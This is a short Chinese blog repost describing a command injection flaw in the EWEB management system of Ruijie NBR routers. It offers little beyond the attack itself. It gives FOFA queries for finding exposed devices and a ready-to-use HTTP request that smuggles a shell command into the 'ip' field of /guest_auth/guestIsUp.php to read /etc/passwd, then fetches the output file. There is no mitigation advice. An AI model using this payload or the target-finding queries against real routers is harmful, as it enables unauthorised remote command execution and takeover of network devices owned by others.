漏洞描述
i ⭐
锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限
漏洞影响
s ✅
锐捷NBR路由器 EWEB网管系统
空间测绘
d ⭕
FOFA:title="锐捷网络-EWEB网管系统"⭕
FOFA:icon_hash="-692947551"
漏洞复现
- ✅访问首页
- ✅执行Payload命令
POST /guest_auth/guestIsUp.php
mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
- 然后访问页面 /guest_auth/test.txt 就可以看到命令执行的结果
个人博客
孤桜懶契:https://gylq.gitee.io/time
标签:
安全
本文转载自: https://blog.csdn.net/qq_35938621/article/details/124182275
版权归原作者 孤桜懶契 所有, 如有侵权,请联系我们删除。
版权归原作者 孤桜懶契 所有, 如有侵权,请联系我们删除。